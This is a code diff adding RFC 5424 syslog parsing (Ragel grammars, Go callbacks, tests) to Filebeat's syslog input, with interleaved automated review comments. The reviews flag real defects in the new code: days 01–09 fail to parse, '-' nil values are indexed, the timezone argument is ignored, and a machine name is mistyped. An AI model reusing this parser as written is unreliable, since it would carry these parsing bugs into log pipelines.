@@ -35,8 +35,11 @@ import ( ) // Parser is generated from a ragel state machine using the following command: -//go:generate ragel -Z -G2 parser.rl -o parser.go -//go:generate goimports -l -w parser.go +//go:generate ragel -Z -G2 parser/rfc3164_parser.rl -o rfc3164_parser.go +//go:generate ragel -Z -G2 parser/rfc5424_parser.rl -o rfc5424_parser.go +//go:generate ragel -Z -G2 parser/format_check.rl -o format_check.go +//go:generate goimports -l -w rfc3164_parser.go +//go:generate goimports -l -w rfc5424_parser.go // Severity and Facility are derived from the priority, theses are the human readable terms // defined in https://tools.ietf.org/html/rfc3164#section-4.1.1. @@ -123,11 +126,7 @@ func NewInput( } forwarder := harvester.NewForwarder(out) - cb := func(data []byte, metadata inputsource.NetworkMetadata) { - ev := parseAndCreateEvent(data, metadata, time.Local, log) - forwarder.Send(ev) - } - + cb := GetCbByConfig(config, forwarder, log) server, err := factory(cb, config.Protocol) if err != nil { return nil, err 
@@ -178,6 +177,35 @@ func (p *Input) Wait() { p.Stop() } +func GetCbByConfig(cfg config, forwarder *harvester.Forwarder, log *logp.Logger) inputsource.NetworkFunc { + switch cfg.Format { + + case syslogFormatRFC5424: + return func(data []byte, metadata inputsource.NetworkMetadata) { + ev := parseAndCreateEvent5424(data, metadata, time.Local, log) + forwarder.Send(ev) + } + + case syslogFormatAuto: + return func(data []byte, metadata inputsource.NetworkMetadata) { + var ev beat.Event + if IsRFC5424Format(data) { + ev = parseAndCreateEvent5424(data, metadata, time.Local, log) + } else { + ev = parseAndCreateEvent3164(data, metadata, time.Local, log) + } + forwarder.Send(ev) + } + case syslogFormatRFC3164: + break + } + + return func(data []byte, metadata inputsource.NetworkMetadata) { + ev := parseAndCreateEvent3164(data, metadata, time.Local, log) + forwarder.Send(ev) + } +} + func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { f := common.MapStr{ "message": strings.TrimRight(ev.Message(), "\n"), @@ -219,6 +247,27 @@ func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time } } + // RFC5424 + if ev.AppName() != "" { + process["name"] = ev.AppName() + } + + if ev.ProcID() != "" { + process["entity_id"] = ev.ProcID() + } + + if ev.MsgID() != "" { + syslog["msgid"] = ev.MsgID() + } + + if ev.Version() != -1 { + syslog["version"] = ev.Version() + } + + if ev.data != nil && len(ev.data) > 0 { + syslog["data"] = ev.data + } + f["syslog"] = syslog f["event"] = event if len(process) > 0 { 
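Review bot: `GetCbByConfig` is exported but has no doc comment, and callers outside the package cannot name its first parameter type `config`; either unexport it or document it. The `case syslogFormatRFC3164: break` arm does nothing, and an unknown `cfg.Format` value silently falls through to the RFC 3164 callback. Replacing that arm with a `default:` that returns the RFC 3164 callback, plus a comment like `// getCbByConfig returns the callback that parses incoming data according to cfg.Format; RFC 3164 is the default.`, would make the fallback explicit.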
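Review bot: The RFC 5424 fields in `createEvent` are copied whenever they are non-empty, so the NILVALUE `-` is emitted as a real value; the expected output in `TestParseAndCreateEvent5424` shows `"entity_id": "-"`. RFC 5424 uses `-` to mean the field is absent, and indexing it makes unrelated senders appear to share a process id in downstream queries and detections. Consider `if id := ev.ProcID(); id != "" && id != "-" {` and the same treatment for `AppName` and `MsgID`. The last check can use the helper added in this commit, `if !ev.IsDataEmpty() {`. `createEvent` starts and ends outside the hunk.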
@@ -232,9 +281,9 @@ func createEvent(ev *event, metadata inputsource.NetworkMetadata, timezone *time return newBeatEvent(ev.Timestamp(timezone), metadata, f) } -func parseAndCreateEvent(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { +func parseAndCreateEvent3164(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { ev := newEvent() - Parse(data, ev) + ParserRFC3164(data, ev) if !ev.IsValid() { log.Errorw("can't parse event as syslog rfc3164", "message", string(data)) return newBeatEvent(time.Now(), metadata, common.MapStr{ @@ -244,6 +293,18 @@ func parseAndCreateEvent(data []byte, metadata inputsource.NetworkMetadata, time return createEvent(ev, metadata, time.Local, log) } +func parseAndCreateEvent5424(data []byte, metadata inputsource.NetworkMetadata, timezone *time.Location, log *logp.Logger) beat.Event { + ev := newEvent() + ParserRFC5424(data, ev) + if !ev.IsValid() { + log.Errorw("can't parse event as syslog rfc5424", "message", string(data)) + return newBeatEvent(time.Now(), metadata, common.MapStr{ + "message": string(data), + }) + } + return createEvent(ev, metadata, time.Local, log) +} + func newBeatEvent(timestamp time.Time, metadata inputsource.NetworkMetadata, fields common.MapStr) beat.Event { event := beat.Event{ Timestamp: timestamp, diff --git a/filebeat/input/syslog/input_test.go b/filebeat/input/syslog/input_test.go index 78cd70d8362..23600278672 100644 --- a/filebeat/input/syslog/input_test.go +++ b/filebeat/input/syslog/input_test.go @@ -194,7 +194,7 @@ func TestSequence(t *testing.T) { }) } -func TestParseAndCreateEvent(t *testing.T) { +func TestParseAndCreateEvent3164(t *testing.T) { cases := map[string]struct { data []byte expected common.MapStr 
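Review bot: `parseAndCreateEvent5424` accepts a `timezone` argument but ends with `createEvent(ev, metadata, time.Local, log)`, so the argument is never used; the RFC 3164 variant shown as context does the same. The new test passes `tz := time.Local`, which hides the problem. The return should be `return createEvent(ev, metadata, timezone, log)`. The failure path also writes the whole raw payload to the error log for every unparsable message; because the input is a network listener, a debug-level or rate-limited log would keep a noisy sender from filling the log.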
@@ -239,7 +239,7 @@ func TestParseAndCreateEvent(t *testing.T) { for title, c := range cases { t.Run(title, func(t *testing.T) { - event := parseAndCreateEvent(c.data, metadata, tz, log) + event := parseAndCreateEvent3164(c.data, metadata, tz, log) assert.Equal(t, c.expected, event.Fields) assert.Equal(t, metadata.Truncated, event.Meta["truncated"]) }) 
@@ -259,3 +259,92 @@ func dummyMetadata() inputsource.NetworkMetadata { addr := &net.IPAddr{IP: parsedIP, Zone: ""} return inputsource.NetworkMetadata{RemoteAddr: addr} } + +func TestParseAndCreateEvent5424(t *testing.T) { + cases := map[string]struct { + data []byte + expected common.MapStr + }{ + "valid data": { + data: []byte(RfcDoc65Example1), + expected: common.MapStr{ + "event": common.MapStr{"severity": 2}, + "hostname": "mymachine.example.com", + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "process": common.MapStr{ + "name": "su", + "entity_id": "-", + }, + "message": "'su root' failed for lonvick on /dev/pts/8", + "syslog": common.MapStr{ + "facility": 4, + "facility_label": "security/authorization", + "priority": 34, + "severity_label": "Critical", + "msgid": "ID47", + "version": 1, + }, + }, + }, + "valid data2": { + data: []byte(RfcDoc65Example3), + expected: common.MapStr{ + "event": common.MapStr{"severity": 5}, + "hostname": "mymachine.example.com", + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "process": common.MapStr{ + "name": "evntslog", + "entity_id": "-", + }, + "message": "An application event log entry...", + "syslog": common.MapStr{ + "facility": 20, + "facility_label": "local4", + "priority": 165, + "severity_label": "Notice", + "msgid": "ID47", + "version": 1, + "data": EventData{ + "exampleSDID@32473": { + "eventID": "1011", + "eventSource": "Application", + "iut": "3", + }, + }, + }, + }, + }, + + "invalid data": { + data: []byte("<34>Oct 11 22:14:15 mymachine su[230]: 'su root' failed for lonvick on /dev/pts/8"), + expected: common.MapStr{ + "log": common.MapStr{ + "source": common.MapStr{ + "address": "127.0.0.1", + }, + }, + "message": "<34>Oct 11 22:14:15 mymachine su[230]: 'su root' failed for lonvick on /dev/pts/8", + }, + }, + } + + tz := time.Local + log := logp.NewLogger("syslog") + metadata := dummyMetadata() + + for title, c := range cases { 
+ t.Run(title, func(t *testing.T) { + event := parseAndCreateEvent5424(c.data, metadata, tz, log) + assert.Equal(t, c.expected, event.Fields) + assert.Equal(t, metadata.Truncated, event.Meta["truncated"]) + }) + } +} diff --git a/filebeat/input/syslog/parser.rl b/filebeat/input/syslog/parser.rl deleted file mode 100644 index e5b2c1b143f..00000000000 --- a/filebeat/input/syslog/parser.rl +++ /dev/null 
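Review bot: The only negative case in `TestParseAndCreateEvent5424` is an RFC 3164 line, so nothing exercises a message that starts as RFC 5424 and then breaks, which is the input a network-facing parser most needs pinned down. Add cases such as a valid header followed by an unterminated structured-data element, a repeated SD-ID, and a param value ending in a backslash, with the expected outcome stated for each. The test also passes `tz := time.Local`, the same value `parseAndCreateEvent5424` hard-codes in its `createEvent` call, so it cannot notice that the `timezone` argument is ignored; a case with a fixed non-local location would be needed to cover that.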
@@ -1,106 +0,0 @@ -// Code generated by ragel DO NOT EDIT. -package syslog - -%%{ - machine syslog; - write data; - variable p p; - variable pe pe; -}%% - -var ( - noDuplicates = []byte{'-', '.'} -) - -// Parse parses Syslog events. -func Parse(data []byte, event *event) { - var p, cs int - pe := len(data) - tok := 0 - eof := len(data) - %%{ - action tok { - tok = p - } - - action priority { - event.SetPriority(data[tok:p]) - } - - action message { - event.SetMessage(data[tok:p]) - } - - action month { - event.SetMonth(data[tok:p]) - } - - action year{ - event.SetYear(data[tok:p]) - } - - action month_numeric { - event.SetMonthNumeric(data[tok:p]) - } - - action day { - event.SetDay(data[tok:p]) - } - - action hour { - event.SetHour(data[tok:p]) - } - - action minute { - event.SetMinute(data[tok:p]) - } - - action second { - event.SetSecond(data[tok:p]) - } - - action nanosecond{ - event.SetNanosecond(data[tok:p]) - } - - # NOTES: This allow to bail out of obvious non valid - # hostname, this might not be ideal in all situation, but - # when this happen we just go to the catch all case and at least - # extract the message - action lookahead_duplicates{ - if p-1 > 0 { - for _, b := range noDuplicates { - if data[p] == b && data[p-1] == b { - p = tok -1 - fgoto catch_all; - } - } - } - } - - action hostname { - event.SetHostname(data[tok:p]) - } - - action program { - event.SetProgram(data[tok:p]) - } - - action pid { - event.SetPid(data[tok:p]) - } - - action timezone { - event.SetTimeZone(data[tok:p]) - } - - action sequence { - event.SetSequence(data[tok:p]) - } - - include syslog_rfc3164 "syslog_rfc3164.rl"; - - write init; - write exec; - }%% -} diff --git a/filebeat/input/syslog/parser/common.rl b/filebeat/input/syslog/parser/common.rl new file mode 100644 index 00000000000..d36d9e29a75 --- /dev/null +++ b/filebeat/input/syslog/parser/common.rl 
@@ -0,0 +1,141 @@ +%%{ + machine common; + action tok { + tok = p + } + + action priority { + event.SetPriority(data[tok:p]) + } + + action message { + event.SetMessage(data[tok:p]) + } + + action month { + event.SetMonth(data[tok:p]) + } + + action year{ + event.SetYear(data[tok:p]) + } + + action month_numeric { + event.SetMonthNumeric(data[tok:p]) + } + + action day { + event.SetDay(data[tok:p]) + } + + action hour { + event.SetHour(data[tok:p]) + } + + action minute { + event.SetMinute(data[tok:p]) + } + + action second { + event.SetSecond(data[tok:p]) + } + + action nanosecond{ + event.SetNanosecond(data[tok:p]) + } + + + action init_data{ + event.data = EventData{} + } + + action init_sd_param{ + state.sd_value_bs = []int{} + } + + action set_sd_param_name{ + state.sd_param_name = string(data[tok:p]) + } + + action set_sd_param_value{ + event.SetData(state.sd_id, state.sd_param_name, data, tok, p, state.sd_value_bs) + } + + action set_sd_id{ + state.sd_id = string(data[tok:p]) + if _, ok := event.data[ state.sd_id ]; ok { + fhold; + } else { + event.data[state.sd_id] = map[string]string{} + } + } + + action set_bs{ + state.sd_value_bs = append(state.sd_value_bs, p) + } + # NOTES: This allow to bail out of obvious non valid + # hostname, this might not be ideal in all situation, but + # when this happen we just go to the catch all case and at least + # extract the message + action lookahead_duplicates{ + if p-1 > 0 { + for _, b := range noDuplicates { + if data[p] == b && data[p-1] == b { + p = tok -1 + fgoto catch_all; + } + } + } + } + + action hostname { + event.SetHostname(data[tok:p]) + } + + action program { + event.SetProgram(data[tok:p]) + } + + action pid { + event.SetPid(data[tok:p]) + } + + action timezone { + event.SetTimeZone(data[tok:p]) + } + + action sequence { + event.SetSequence(data[tok:p]) + } + + action version{ + event.SetVersion(data[tok:p]) + } + + action app_name{ + event.SetAppName(data[tok:p]) + } + + action proc_id { + 
event.SetProcID(data[tok:p]) + } + + action msg_id { + event.SetMsgID(data[tok:p]) + } + + SP = ' '; + + # backslash "\" + BS = 0x5C; + + NIL_VALUE = "-"; + PRINT_US_ASCII = 0x21..0x7E; + NONZERO_DIGIT = [1-9]; + + # OCTET = 0x00..0xFF; + OCTET = any; + BOM = 0xEF 0xBB 0xBF; + UTF_8_STRING = OCTET*; + +}%% diff --git a/filebeat/input/syslog/parser/format_check.rl b/filebeat/input/syslog/parser/format_check.rl new file mode 100644 index 00000000000..4b842918816 --- /dev/null +++ b/filebeat/input/syslog/parser/format_check.rl @@ -0,0 +1,30 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine format_check; + write data; + variable p p; + variable pe pe; +}%% + +func IsRFC5424Format(data []byte) bool { + var p, cs int + isRFC5424 := false + pe := len(data) + %%{ + + action set_true { + isRFC5424 = true + } + + include common "common.rl"; + include syslog_rfc5424 "syslog_rfc5424.rl"; + + main := ("<" PRIVAL_RANGE ">" VERSION_RANGE SP digit{4}>set_true) ; + + write init; + write exec; + }%% + return isRFC5424 +} diff --git a/filebeat/input/syslog/parser/rfc3164_parser.rl b/filebeat/input/syslog/parser/rfc3164_parser.rl new file mode 100644 index 00000000000..02054231b65 --- /dev/null +++ b/filebeat/input/syslog/parser/rfc3164_parser.rl @@ -0,0 +1,32 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine syslog_rfc3154; + write data; + variable p p; + variable pe pe; +}%% + +var ( + noDuplicates = []byte{'-', '.'} +) + +// Parse parses Syslog events. +func ParserRFC3164(data []byte, event *event) { + var p, cs int + pe := len(data) + tok := 0 + eof := len(data) + %%{ + + include common "common.rl"; + include syslog_rfc3164 "syslog_rfc3164.rl"; + + write init; + write exec; + }%% + +} + + diff --git a/filebeat/input/syslog/parser/rfc5424_parser.rl b/filebeat/input/syslog/parser/rfc5424_parser.rl new file mode 100644 index 00000000000..31605e27d16 --- /dev/null +++ b/filebeat/input/syslog/parser/rfc5424_parser.rl 
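Review bot: The `set_sd_id` action handles a repeated SD-ID with a bare `fhold;` and no comment, so a reader cannot tell whether the message is meant to be rejected or the element merged into the existing entry. RFC 5424 forbids the same SD-ID appearing twice in one message, so if rejection is the intent, say so above the branch, e.g. `# duplicate SD-ID is invalid per RFC 5424: step back so the machine fails on this element`, and pin it with a test. This action also reads and writes `event.data` directly, while the neighbouring actions go through setters such as `event.SetData`; a small method on `event` would keep the map handling in one place.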
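Review bot: `IsRFC5424Format` sets its flag only at `digit{4}>set_true`, i.e. when a four-digit year follows the version, yet `syslog_rfc5424.rl` defines `TIMESTAMP = NIL_VALUE | (FULL_DATE "T" FULL_TIME)`. A valid RFC 5424 message with a `-` timestamp is therefore reported as not RFC 5424 and, assuming the caller uses this result to pick a parser (not visible here), is handed to the RFC 3164 path. Accepting both forms would look like `main := ("<" PRIVAL_RANGE ">" VERSION_RANGE SP (NIL_VALUE | digit{4}) >set_true);`. The exported function also needs a doc comment stating that it inspects only the prefix and does not validate the rest of the message.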
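Review bot: The machine is declared as `machine syslog_rfc3154;`, which looks like a typo for 3164 and leaks into every generated identifier (`syslog_rfc3154_start`, `syslog_rfc3154_en_catch_all`, and so on). Rename it to `machine syslog_rfc3164;` and regenerate; `rfc5424_parser.rl` already shares its machine name with the file it includes, so the same pattern should work here. The doc comment still reads `// Parse parses Syslog events.` although the function is now `ParserRFC3164`; it should open with the new name, e.g. `// ParserRFC3164 parses data as an RFC 3164 (BSD) syslog message into event.`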
@@ -0,0 +1,36 @@ +// Code generated by ragel DO NOT EDIT. +package syslog + +%%{ + machine syslog_rfc5424; + write data; + variable p p; + variable pe pe; +}%% + +type machineState struct { + sd_id string + sd_param_name string + sd_value_bs []int +} + +func ParserRFC5424(data []byte, event *event) { + var p, cs int + state := machineState{ + sd_value_bs : []int{}, + } + pe := len(data) + tok := 0 + eof := len(data) + %%{ + + + include common "common.rl"; + include syslog_rfc5424 "syslog_rfc5424.rl"; + + main := HEADER SP STRUCTURED_DATA (SP MSG)?; + + write init; + write exec; + }%% +} diff --git a/filebeat/input/syslog/syslog_rfc3164.rl b/filebeat/input/syslog/parser/syslog_rfc3164.rl similarity index 100% rename from filebeat/input/syslog/syslog_rfc3164.rl rename to filebeat/input/syslog/parser/syslog_rfc3164.rl diff --git a/filebeat/input/syslog/parser/syslog_rfc5424.rl b/filebeat/input/syslog/parser/syslog_rfc5424.rl new file mode 100644 index 00000000000..b72e3bc78f7 --- /dev/null +++ b/filebeat/input/syslog/parser/syslog_rfc5424.rl 
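Review bot: `ParserRFC5424` is exported without a doc comment, and the contract a caller most needs is not written down: the actions fill `event` field by field as bytes are consumed, so fields parsed before a syntax error stay set and the result is usable only after `event.IsValid()` (which `parseAndCreateEvent5424` does check). Suggested comment: `// ParserRFC5424 parses data as an RFC 5424 syslog message into event; on malformed input the event may be partially filled, so callers must check event.IsValid().` The `machineState` fields `sd_id`, `sd_param_name` and `sd_value_bs` would conventionally be `sdID`, `sdParamName` and `sdValueBS` in Go (the actions in `common.rl` reference them and would change with them). `sd_value_bs` deserves a one-line comment saying that it holds the offsets of backslashes seen in the current param value.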
@@ -0,0 +1,63 @@ +%%{ + machine syslog_rfc5424; + + # Syslog Message Format + # https://tools.ietf.org/html/rfc5424#section-6 + + # PRI: range 0 .. 191 + PRIVAL_RANGE = (('1' ('9' ('0' | '1'){,1} + | '0'..'8' ('0'..'9'){,1}){,1}) + | ('2'..'9' ('0'..'9'){,1}) + | ('0')); + PRIVAL = PRIVAL_RANGE >tok %priority; + PRI = "<" PRIVAL ">"; + + VERSION_RANGE = (NONZERO_DIGIT digit{0,2}); + VERSION = VERSION_RANGE>tok %version; + + # timestamp + DATE_FULLYEAR = digit{4}>tok %year; + DATE_MONTH = (("0"[1-9]) | ("1"[0-2]))>tok %month_numeric; + DATE_MDAY = (([12][0-9]) | ("3"[01]))>tok %day; + FULL_DATE = DATE_FULLYEAR "-" DATE_MONTH "-" DATE_MDAY; + + TIME_HOUR = ([01][0-9] | "2"[0-3])>tok %hour; + TIME_MINUTE = ([0-5][0-9])>tok %minute; + TIME_SECOND = ([0-5][0-9])>tok %second; + TIME_SECFRAC = '.' digit{1,6}>tok %nanosecond; + TIME_NUMOFFSET = ('+' | '-') ([0-5][0-9]) ':' ([0-5][0-9]); + TIME_OFFSET = 'Z' | TIME_NUMOFFSET >tok %timezone; + PARTIAL_TIME = TIME_HOUR ":" TIME_MINUTE ":" TIME_SECOND TIME_SECFRAC?; + FULL_TIME = PARTIAL_TIME TIME_OFFSET; + + TIMESTAMP = NIL_VALUE | (FULL_DATE "T" FULL_TIME); + + HOSTNAME = NIL_VALUE | PRINT_US_ASCII{1,255} >tok %hostname; + APP_NAME = NIL_VALUE | PRINT_US_ASCII{1,48} >tok %app_name; + PROCID = NIL_VALUE | PRINT_US_ASCII{1,128} >tok %proc_id; + MSGID = NIL_VALUE | PRINT_US_ASCII{1,32} >tok %msg_id; + + HEADER = PRI VERSION SP TIMESTAMP SP HOSTNAME + SP APP_NAME SP PROCID SP MSGID; + + + # + + escapes_char = ('"' | "]" | BS); + param_value_escapes = (BS>set_bs escapes_char); + SD_NAME = (PRINT_US_ASCII - ('=' | SP | ']' | '"')){1,32}; + + SD_ID = SD_NAME >tok %set_sd_id; + PARAM_NAME = SD_NAME >tok %set_sd_param_name; + PARAM_VALUE = ((OCTET - escapes_char) | param_value_escapes)+ >tok %set_sd_param_value; + SD_PARAM = PARAM_NAME "=" '"' PARAM_VALUE '"' >init_sd_param; + SD_ELEMENT = "[" SD_ID (SP SD_PARAM+)* "]"; + STRUCTURED_DATA = NIL_VALUE | SD_ELEMENT+ >init_data; + + MSG = OCTET* >tok %message; + + + + + +}%% 
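Review bot: `DATE_MDAY = (([12][0-9]) | ("3"[01]))` has no branch for a leading zero, so days 01 through 09 never match and any RFC 5424 message stamped in the first nine days of a month fails the header and falls back to the unparsed-message path. For a security log pipeline that is a recurring gap in parsed fields; the rule should be `DATE_MDAY = (("0"[1-9]) | ([12][0-9]) | ("3"[01]))>tok %day;`, with a test fixture dated for example the 5th. Two smaller points in the same block: `TIME_NUMOFFSET` allows offset hours up to 59 via `[0-5][0-9]`, and in `TIME_OFFSET = 'Z' | TIME_NUMOFFSET >tok %timezone;` the `Z` branch runs no action, so confirm that an event without a zone is treated as UTC rather than as the local zone.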
diff --git a/filebeat/input/syslog/parser.go b/filebeat/input/syslog/rfc3164_parser.go similarity index 88% rename from filebeat/input/syslog/parser.go rename to filebeat/input/syslog/rfc3164_parser.go index 4e5c38b8a45..21f1747f5d1 100644 --- a/filebeat/input/syslog/parser.go +++ b/filebeat/input/syslog/rfc3164_parser.go @@ -15,37 +15,37 @@ // specific language governing permissions and limitations // under the License. -//line parser.rl:1 +//line parser/rfc3164_parser.rl:1 // Code generated by ragel DO NOT EDIT. package syslog -//line parser.go:8 -const syslog_start int = 0 -const syslog_first_final int = 2 -const syslog_error int = -1 +//line rfc3164_parser.go:8 +const syslog_rfc3154_start int = 0 +const syslog_rfc3154_first_final int = 2 +const syslog_rfc3154_error int = -1 -const syslog_en_main int = 0 -const syslog_en_catch_all int = 1 +const syslog_rfc3154_en_main int = 0 +const syslog_rfc3154_en_catch_all int = 1 -//line parser.rl:9 +//line parser/rfc3164_parser.rl:9 var ( noDuplicates = []byte{'-', '.'} ) // Parse parses Syslog events. -func Parse(data []byte, event *event) { +func ParserRFC3164(data []byte, event *event) { var p, cs int pe := len(data) tok := 0 eof := len(data) -//line parser.go:31 +//line rfc3164_parser.go:31 { - cs = syslog_start + cs = syslog_rfc3154_start } -//line parser.go:36 +//line rfc3164_parser.go:36 { if (p) == (pe) { goto _test_eof @@ -329,17 +329,17 @@ func Parse(data []byte, event *event) { } goto tr0 tr0: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st2 tr133: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p 
@@ -349,20 +349,20 @@ func Parse(data []byte, event *event) { goto _test_eof2 } st_case_2: -//line parser.go:340 +//line rfc3164_parser.go:340 goto st2 tr1: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st3 tr134: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -372,7 +372,7 @@ func Parse(data []byte, event *event) { goto _test_eof3 } st_case_3: -//line parser.go:363 +//line rfc3164_parser.go:363 switch data[(p)] { case 65: goto tr4 @@ -396,17 +396,17 @@ func Parse(data []byte, event *event) { } goto st2 tr14: -//line parser.rl:22 +//line parser/common.rl:3 tok = p goto st4 tr135: -//line parser.rl:97 +//line parser/common.rl:107 event.SetSequence(data[tok:p]) -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -416,7 +416,7 @@ func Parse(data []byte, event *event) { goto _test_eof4 } st_case_4: -//line parser.go:407 +//line rfc3164_parser.go:407 if 48 <= data[(p)] && data[(p)] <= 57 { goto st5 } @@ -449,7 +449,7 @@ func Parse(data []byte, event *event) { } goto st2 tr18: -//line parser.rl:38 +//line parser/common.rl:19 event.SetYear(data[tok:p]) @@ -459,13 +459,13 @@ func Parse(data []byte, event *event) { goto _test_eof8 } st_case_8: -//line parser.go:450 +//line rfc3164_parser.go:450 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr19 } goto st2 tr19: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -475,7 +475,7 @@ func Parse(data []byte, event *event) { goto _test_eof9 } st_case_9: -//line parser.go:466 +//line rfc3164_parser.go:466 if 48 <= data[(p)] && data[(p)] <= 57 { goto st10 } @@ -490,7 +490,7 @@ func Parse(data []byte, event *event) { } goto st2 tr21: -//line parser.rl:42 +//line parser/common.rl:23 event.SetMonthNumeric(data[tok:p]) 
@@ -500,13 +500,13 @@ func Parse(data []byte, event *event) { goto _test_eof11 } st_case_11: -//line parser.go:491 +//line rfc3164_parser.go:491 if 48 <= data[(p)] && data[(p)] <= 51 { goto tr22 } goto st2 tr22: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -516,7 +516,7 @@ func Parse(data []byte, event *event) { goto _test_eof12 } st_case_12: -//line parser.go:507 +//line rfc3164_parser.go:507 if 48 <= data[(p)] && data[(p)] <= 57 { goto st13 } @@ -539,7 +539,7 @@ func Parse(data []byte, event *event) { } goto st2 tr24: -//line parser.rl:46 +//line parser/common.rl:27 event.SetDay(data[tok:p]) @@ -549,7 +549,7 @@ func Parse(data []byte, event *event) { goto _test_eof14 } st_case_14: -//line parser.go:540 +//line rfc3164_parser.go:540 if data[(p)] == 50 { goto tr26 } @@ -558,7 +558,7 @@ func Parse(data []byte, event *event) { } goto st2 tr25: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -568,7 +568,7 @@ func Parse(data []byte, event *event) { goto _test_eof15 } st_case_15: -//line parser.go:559 +//line rfc3164_parser.go:559 if 48 <= data[(p)] && data[(p)] <= 57 { goto st16 } @@ -583,7 +583,7 @@ func Parse(data []byte, event *event) { } goto st2 tr28: -//line parser.rl:50 +//line parser/common.rl:31 event.SetHour(data[tok:p]) @@ -593,13 +593,13 @@ func Parse(data []byte, event *event) { goto _test_eof17 } st_case_17: -//line parser.go:584 +//line rfc3164_parser.go:584 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr29 } goto st2 tr29: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -609,7 +609,7 @@ func Parse(data []byte, event *event) { goto _test_eof18 } st_case_18: -//line parser.go:600 +//line rfc3164_parser.go:600 if 48 <= data[(p)] && data[(p)] <= 57 { goto st19 } @@ -624,7 +624,7 @@ func Parse(data []byte, event *event) { } goto st2 tr31: -//line parser.rl:54 +//line parser/common.rl:35 event.SetMinute(data[tok:p]) 
@@ -634,13 +634,13 @@ func Parse(data []byte, event *event) { goto _test_eof20 } st_case_20: -//line parser.go:625 +//line rfc3164_parser.go:625 if 48 <= data[(p)] && data[(p)] <= 53 { goto tr32 } goto st2 tr32: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -650,7 +650,7 @@ func Parse(data []byte, event *event) { goto _test_eof21 } st_case_21: -//line parser.go:641 +//line rfc3164_parser.go:641 if 48 <= data[(p)] && data[(p)] <= 57 { goto st22 } @@ -681,19 +681,19 @@ func Parse(data []byte, event *event) { } goto st2 tr34: -//line parser.rl:58 +//line parser/common.rl:39 event.SetSecond(data[tok:p]) goto st23 tr61: -//line parser.rl:93 +//line parser/common.rl:103 event.SetTimeZone(data[tok:p]) goto st23 tr68: -//line parser.rl:62 +//line parser/common.rl:43 event.SetNanosecond(data[tok:p]) @@ -703,7 +703,7 @@ func Parse(data []byte, event *event) { goto _test_eof23 } st_case_23: -//line parser.go:694 +//line rfc3164_parser.go:694 switch data[(p)] { case 58: goto tr41 @@ -729,11 +729,11 @@ func Parse(data []byte, event *event) { } goto tr0 tr39: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -748,7 +748,7 @@ func Parse(data []byte, event *event) { goto st24 tr42: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -767,7 +767,7 @@ func Parse(data []byte, event *event) { goto _test_eof24 } st_case_24: -//line parser.go:754 +//line rfc3164_parser.go:754 switch data[(p)] { case 58: goto tr44 @@ -793,11 +793,11 @@ func Parse(data []byte, event *event) { } goto st2 tr40: -//line parser.rl:22 +//line parser/common.rl:3 tok = p -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { @@ -812,7 +812,7 @@ func Parse(data []byte, event *event) { goto st25 tr43: -//line parser.rl:70 +//line parser/common.rl:80 if p-1 > 0 { for _, b := range noDuplicates { 
@@ -831,7 +831,7 @@ func Parse(data []byte, event *event) { goto _test_eof25 } st_case_25: -//line parser.go:814 +//line rfc3164_parser.go:814 switch data[(p)] { case 32: goto tr45 @@ -864,7 +864,7 @@ func Parse(data []byte, event *event) { } goto st2 tr45: -//line parser.rl:81 +//line parser/common.rl:91 event.SetHostname(data[tok:p]) @@ -874,7 +874,7 @@ func Parse(data []byte, event *event) { goto _test_eof26 } st_case_26: -//line parser.go:857 +//line rfc3164_parser.go:857 switch data[(p)] { case 32: goto tr0 @@ -888,7 +888,7 @@ func Parse(data []byte, event *event) { } goto tr47 tr47: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -898,7 +898,7 @@ func Parse(data []byte, event *event) { goto _test_eof27 } st_case_27: -//line parser.go:881 +//line rfc3164_parser.go:881 switch data[(p)] { case 32: goto st2 @@ -914,7 +914,7 @@ func Parse(data []byte, event *event) { } goto st27 tr49: -//line parser.rl:85 +//line parser/common.rl:95 event.SetProgram(data[tok:p]) @@ -924,7 +924,7 @@ func Parse(data []byte, event *event) { goto _test_eof28 } st_case_28: -//line parser.go:907 +//line rfc3164_parser.go:907 switch data[(p)] { case 32: goto st29 @@ -946,7 +946,7 @@ func Parse(data []byte, event *event) { st_case_29: goto tr0 tr50: -//line parser.rl:85 +//line parser/common.rl:95 event.SetProgram(data[tok:p]) @@ -956,13 +956,13 @@ func Parse(data []byte, event *event) { goto _test_eof30 } st_case_30: -//line parser.go:939 +//line rfc3164_parser.go:939 if 48 <= data[(p)] && data[(p)] <= 57 { goto tr52 } goto st2 tr52: -//line parser.rl:22 +//line parser/common.rl:3 tok = p @@ -972,7 +972,7 @@ func Parse(data []byte, event *event) { goto _test_eof31 } st_case_31: -//line parser.go:955 +//line rfc3164_parser.go:955 if data[(p)] == 93 { goto tr54 } @@ -981,7 +981,7 @@ func Parse(data []byte, event *event) { } goto st2 tr54: -//line parser.rl:89 +//line parser/common.rl:99 event.SetPid(data[tok:p]) 
